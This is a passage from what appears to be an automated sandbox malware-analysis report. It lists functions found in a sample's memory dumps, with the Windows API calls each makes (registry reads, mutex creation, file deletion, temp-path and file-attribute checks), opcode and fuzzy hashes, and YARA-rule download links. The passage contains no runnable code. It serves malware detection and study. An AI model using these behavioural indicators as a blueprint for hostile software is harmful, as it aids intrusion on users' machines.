                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateOpenValue
                                          • String ID:
                                          • API String ID: 2195001959-0
                                          • Opcode ID: b014cfda2cd8ff57eb012d96267342e5e53468bdcf4cf32f608da3f8f94e7209
                                          • Instruction ID: 7b09411fb4e59567ae2c2c109c1bd50c0a7bd51806aa86183a15f8f745bdc615
                                          • Opcode Fuzzy Hash: b014cfda2cd8ff57eb012d96267342e5e53468bdcf4cf32f608da3f8f94e7209
                                          • Instruction Fuzzy Hash: DB41B370210209AFEB2CCF28CC85BDD7B76EB45311F608218FD159A2D5D775EAC4AB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F03D90, Relevance: 4.6, APIs: 3, Instructions: 108registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00000001,00F077EC,?,00000000), ref: 00F03DD1
                                          • RegQueryValueExA.KERNEL32(00F077EC,?,00000000,00000000,?,00000400,?,00000000), ref: 00F03DF9
                                          • RegCloseKey.KERNEL32(00F077EC,?,00000000), ref: 00F03E02
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 69df28a6b774f801c35fba8802ec96b767500da801b966360335a3d8743c0923
                                          • Instruction ID: 3af59e023f0fb8a2397a8bfeb315888da499eae7246a8865dce5bafc6e1d7517
                                          • Opcode Fuzzy Hash: 69df28a6b774f801c35fba8802ec96b767500da801b966360335a3d8743c0923
                                          • Instruction Fuzzy Hash: FF31F671600109AFEB28DF24CD45BEE7B79EB85314F10425CF944972C1DB79EB89ABA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1EAAA, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F1EB1D
                                          • _free.LIBCMT ref: 00F1EB73
                                            • Part of subcall function 00F1E94F: _free.LIBCMT ref: 00F1E9A7
                                            • Part of subcall function 00F1E94F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00F2B608), ref: 00F1E9B9
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$InformationTimeZone
                                          • String ID:
                                          • API String ID: 597776487-0
                                          • Opcode ID: e0781f5ee00724267c9b6d5b6d444f84c4024f79b30ecd44e6054c7cc5f2ef5a
                                          • Instruction ID: b92593e05e2c27ef55fd186987fbc414f99c84e01268ad3c5016773398786341
                                          • Opcode Fuzzy Hash: e0781f5ee00724267c9b6d5b6d444f84c4024f79b30ecd44e6054c7cc5f2ef5a
                                          • Instruction Fuzzy Hash: 0D213872D0912897C730E7249C81EEAB76C9FD0730F2402A5EC97A2181EE749EC5B990
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F17645, Relevance: 4.5, APIs: 3, Instructions: 17fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileW.KERNEL32(00F12752,?,00F12752,?,?,?,?), ref: 00F1764D
                                          • GetLastError.KERNEL32(?,00F12752,?,?,?,?), ref: 00F17657
                                          • __dosmaperr.LIBCMT ref: 00F1765E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: DeleteErrorFileLast__dosmaperr
                                          • String ID:
                                          • API String ID: 1545401867-0
                                          • Opcode ID: 26dd226757390eedd5e4752f9066cf6ff6a4930c7855ff5ab85b1ae27430c539
                                          • Instruction ID: f5d422417265ca419508c781f0d7bc00dfc59a50411544b5452b43f44f56fa20
                                          • Opcode Fuzzy Hash: 26dd226757390eedd5e4752f9066cf6ff6a4930c7855ff5ab85b1ae27430c539
                                          • Instruction Fuzzy Hash: 87D0123260970C778B203BF6BD0D85B3F5C9F813747140665F92CC55A0DF39C892A950
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F025B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: <
                                          • API String ID: 0-4251816714
                                          • Opcode ID: c82b67fcf904cac09619d26a4e206f56e451d6822848a530269855dccba8a61d
                                          • Instruction ID: 7e1e188f83e9f7346800d939c5daac7d10fb95dfd9db6e5be9b8d6a703ed9058
                                          • Opcode Fuzzy Hash: c82b67fcf904cac09619d26a4e206f56e451d6822848a530269855dccba8a61d
                                          • Instruction Fuzzy Hash: 725142716043059BDB68AF28C84939E7BE1FF89304F904A1EFC45872C5DBB5C985ABD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F05A87, Relevance: 3.2, APIs: 2, Instructions: 217COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F049F0: GetTempPathW.KERNEL32(00000104,?,?,?), ref: 00F0470E
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F05AC4
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F05BEB
                                            • Part of subcall function 00F04010: GetVersionExW.KERNEL32(0000011C,?,?,80000001), ref: 00F04066
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile$PathTempVersion
                                          • String ID:
                                          • API String ID: 2626274839-0
                                          • Opcode ID: 7b751a51f544f996737c3be38844ddf9f2a51c54f069f9441a0a2ad761bc8bfc
                                          • Instruction ID: 8ee1a2758d8827a6d8d438ba62dc16038cfa56a7518aba8961dea2def12f4502
                                          • Opcode Fuzzy Hash: 7b751a51f544f996737c3be38844ddf9f2a51c54f069f9441a0a2ad761bc8bfc
                                          • Instruction Fuzzy Hash: C7615DB1B006045BEF1CE738DC8A76FB662AF81710F108618E4119B3D7D7B99984BF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F04DE0, Relevance: 3.1, APIs: 2, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00F04E41
                                          • GetLastError.KERNEL32(?,00000000), ref: 00F04E47
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID:
                                          • API String ID: 1925916568-0
                                          • Opcode ID: ec49bdc3de9f1bed12976fa52a9a023f3d9d2607a8ebe528a2e50c9b8a271e98
                                          • Instruction ID: 37a171220b5be0f83a9503af67d480ffe58696fa0b6b14a32b73eb593f9dee1c
                                          • Opcode Fuzzy Hash: ec49bdc3de9f1bed12976fa52a9a023f3d9d2607a8ebe528a2e50c9b8a271e98
                                          • Instruction Fuzzy Hash: 5A31F271E001099BDF18DF68CC84BAEF7B2FF44301F608569E212E76D1D738AA85AB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F127DB, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9cac9964836177d8e92a4eccb0d91c19edb5146338b83226aa7510670845fd1
                                          • Instruction ID: 9d0c0606904f63e2a2ca58108be58c40538b9482695491fbf841012882dcdebe
                                          • Opcode Fuzzy Hash: a9cac9964836177d8e92a4eccb0d91c19edb5146338b83226aa7510670845fd1
                                          • Instruction Fuzzy Hash: B22186329012087EEB11BBA8DC46BDE7769AF41378F200325F9243B1D1DB745E95E6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F12AB3, Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00F129EA,?,?,00000000,00000000), ref: 00F12AE1
                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00F129EA,?,?,00000000,00000000), ref: 00F12AF5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Time$System$FileLocalSpecific
                                          • String ID:
                                          • API String ID: 1707611234-0
                                          • Opcode ID: a94bfee9d807dcc142c8ea60fe17f5eb14dba2e72f950ab0022b8739ebfad876
                                          • Instruction ID: a2095f23c3d9e444952d023cb239ea99b650a45ad05edd657e7ae3e46a6219e6
                                          • Opcode Fuzzy Hash: a94bfee9d807dcc142c8ea60fe17f5eb14dba2e72f950ab0022b8739ebfad876
                                          • Instruction Fuzzy Hash: 08111C7290420CABCB11DFD5CC84ADF77BCAF48320F104266E516E6180EB34EA959B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F151DE, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 742fd1e02dd43f5ccb7af4e94a16000e828e8456d543e5529fc86df1bf704481
                                          • Instruction ID: 547b2a2ef6a16ce2572bc6bcca712fd670959a082572d6ad7a651e0c3b3da90e
                                          • Opcode Fuzzy Hash: 742fd1e02dd43f5ccb7af4e94a16000e828e8456d543e5529fc86df1bf704481
                                          • Instruction Fuzzy Hash: D9E06D23A55910D2E722763A7C463FA3686ABC1B72F21032AF424DA1D0EF7948C27695
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F0F8C0, Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00F0F9EC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Concurrency::cancel_current_task
                                          • String ID:
                                          • API String ID: 118556049-0
                                          • Opcode ID: 6ef23494d4cab6ffee1347d31e12aae61998c6c6f85e047a0eb1ca5c4f545116
                                          • Instruction ID: 4fec970d6c71aba2ed81cf33d244ddc8567da9395e3ad16343a2f274b2e91a7b
                                          • Opcode Fuzzy Hash: 6ef23494d4cab6ffee1347d31e12aae61998c6c6f85e047a0eb1ca5c4f545116
                                          • Instruction Fuzzy Hash: E731F772A00115AFCB24EF28CC816AEB7A9EB45360720023AFC15D7695DB30DD59B7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F04F35, Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F04F3E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 535bca8a78a4af7abda52edebb22c0e53790374cf4286277c70a7e618489fee0
                                          • Instruction ID: 77a268a07de988378d8817430a127cca86dca5d9ee104dafed3760a234239d00
                                          • Opcode Fuzzy Hash: 535bca8a78a4af7abda52edebb22c0e53790374cf4286277c70a7e618489fee0
                                          • Instruction Fuzzy Hash: AD2157717001025BEB2CDB78DC8975EBA629F82311F208718F414877E6D779A984BB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F05062, Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F05065
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 21769b6ddfd571f19ec39ac968c6398a6a053eaeab71ba2a70383fbcbd261e1e
                                          • Instruction ID: 61b9fe1d4bd865a65528af9e402ad28d904b196144d6b3ddbbc44d62b56f15aa
                                          • Opcode Fuzzy Hash: 21769b6ddfd571f19ec39ac968c6398a6a053eaeab71ba2a70383fbcbd261e1e
                                          • Instruction Fuzzy Hash: 4E21F93171050657EB2CCB78DD8976EF662AF82710F20871CE054977D6C7BA9984BF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F053D7, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F053DA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: ca507dc6885fb72e234c532e367f2cc7de45f6f380b01db38ac55f0d61e9cffb
                                          • Instruction ID: c57a815b49c0e84f5cbae594662b54605a8e76ba1a267c632e766135af7c29a1
                                          • Opcode Fuzzy Hash: ca507dc6885fb72e234c532e367f2cc7de45f6f380b01db38ac55f0d61e9cffb
                                          • Instruction Fuzzy Hash: 57213731B1050457EB1CCBB8DC8879EFA629F82715F208A18E054876D6D7B999C0BF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F054FE, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F05501
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: ae456954cb7f7313de59356e496df5ad7f12c47e0c45b6c7a4e0889d426fdc2b
                                          • Instruction ID: e11ff39abadc52079a8b4164c25fcc57e908c49153dc0bb9a085f6e5196b9bc0
                                          • Opcode Fuzzy Hash: ae456954cb7f7313de59356e496df5ad7f12c47e0c45b6c7a4e0889d426fdc2b
                                          • Instruction Fuzzy Hash: 7521F632B106055BEB2CCB78DD8976EBA639B86718F248618E0549B2D5C7B9D980BF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F05625, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F05628
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 6066d55ba7e26dc2cd23e500a9bf54d8a48049949579bf4582cc8b38b17f176e
                                          • Instruction ID: 32ba734360d6135e787e93181e5609de3b471cb658dc28c9e724d1d544aa71f3
                                          • Opcode Fuzzy Hash: 6066d55ba7e26dc2cd23e500a9bf54d8a48049949579bf4582cc8b38b17f176e
                                          • Instruction Fuzzy Hash: F0212931B0050557EB1C9B78DD8975EF7629F86714F60871CE051973D6C7BA9980BF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F0574C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F0574F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: c06c4df2e5f05d387fe636e16833e21474f772603460bfe70f92a2823f10d42d
                                          • Instruction ID: 3d2ce6ad3d3370b47605a337c3c287bf4b845428f9e9d044280b90bc5c97c8a1
                                          • Opcode Fuzzy Hash: c06c4df2e5f05d387fe636e16833e21474f772603460bfe70f92a2823f10d42d
                                          • Instruction Fuzzy Hash: A2214C317106059BDB1C8B78DD8975EFA629F82710F208718E454977D6C7B99980BF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F05873, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00F05876
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 538f91eaec15bb693c3a2db155415263729af6f2e7b82a0d5274a1d1e2edfd9e
                                          • Instruction ID: 653647926774e305d4f2fc01ff72d7259d3ec1a7c0d00b7ce74cc573a256998f
                                          • Opcode Fuzzy Hash: 538f91eaec15bb693c3a2db155415263729af6f2e7b82a0d5274a1d1e2edfd9e
                                          • Instruction Fuzzy Hash: AE215A31B015019BEB1C9B78DD8976EF7A29F82710F208B18E4608B3D6D7BD99807F80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1645F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 6ee4221dc78fa2c38d3652c079dfdd242a13d7e79f7c4f267e7dd60be5bbe1c4
                                          • Instruction ID: 441194e964523a1191694a006096e8fde9e9e8b21a0ba69e68880a6e53b9e13c
                                          • Opcode Fuzzy Hash: 6ee4221dc78fa2c38d3652c079dfdd242a13d7e79f7c4f267e7dd60be5bbe1c4
                                          • Instruction Fuzzy Hash: 23111571A0420AAFCF05DF58E9419DA7BF5EF48314F0540A9F809EB251D630EA21DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F17B94, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F1AD8F: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F17094,00000001,00000364,00000006,000000FF,?,?,00F0FD13,00F0E3EC,?,00F0EC38,E800F311), ref: 00F1ADD0
                                          • _free.LIBCMT ref: 00F17C03
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 0cf873de86ff1509048b2d9677ac235734e71833ea96ae7a256d4af9f5700417
                                          • Instruction ID: 32504fc903547c4a61018e6803593ab38a85d0f0988a98650464699141945bd1
                                          • Opcode Fuzzy Hash: 0cf873de86ff1509048b2d9677ac235734e71833ea96ae7a256d4af9f5700417
                                          • Instruction Fuzzy Hash: 7D014972A08356ABC321EF58C8819D9FBA8FB05370F140669E549A76C0E7706C50C7E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F12769, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
